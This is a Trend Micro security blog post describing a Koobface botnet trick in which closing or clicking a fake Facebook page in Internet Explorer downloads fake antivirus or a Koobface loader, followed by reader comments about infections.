Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    August 2014
    S M T W T F S
    « Jul    
     12
    3456789
    10111213141516
    17181920212223
    24252627282930
    31  
  • About Us

    The Koobface botnet is widely known to install FAKEAV or rogue antivirus malware onto a victim’s PC. It has a dedicated component which actually installs the FAKEAV onto the user’s system. However, the Koobface gang has added a new twist to its fake Facebook page.

    When the user closes the window/tab with the fake Facebook page, a popup window appears. Whatever button the user clicks, this new Koobface variant is downloaded onto the affected system. Here’s a video that illustrates this behavior:

    This is the script used by cybercriminals to perform this new routine; it only works for users who used Internet Explorer to visit the fake page:

    KOOBFACE Script
    Figure 1. Koobface Script

    The scripts above leaves the user with very little choice – closing the browser window downloads a FakeAV variant (detected as TROJ_FAKEAV.FGR), while clicking anywhere on the web page will download a Koobface loader (detected as WORM_KOOBFACE.AZ).





    Share this article
    Get the latest on malware protection from TrendLabs
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   del.icio.us   StumbleUpon




    • abitowhit

      Does killing all IE processes abort over clicking on anything? A button is a button is a button, just cuz it says close, abort, quit or donottinfectme does not mean it will close, abort,quit or notinfectme. :)

    • Pingback: FAKEAV propaga nos links pagos dos motores de busca | Unsecurity .info - Segurança Web em Portugal

    • Pingback: Close Encounters of a Viral Kind | Geekazine.com

    • http://kerry.is-a-geek.org/upoccasionally Kerry

      Tons of people are falling for this. I have seen literally dozens of customers infected with Koobface and whatever flavor of rogue AV/AS is out this week. Looking for the installer for Green AV, SoftSave, and the latest Quick Heal Cleaner.

    • becca

      Help i got the fake av how do i get rid of it i updated from my 08 antivirus plus antispyware to the 2010 version but don’t think that got rid of it. Best buy where i bought everything including their black tie protection 12/2008 informed me today that it ll cost me $200 for them to do it!!!!Can you please tell me how to get rid of it

    • Pingback: UnderForge of Lack » Blog Archive » 2009.09.19 土曜日



     

    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice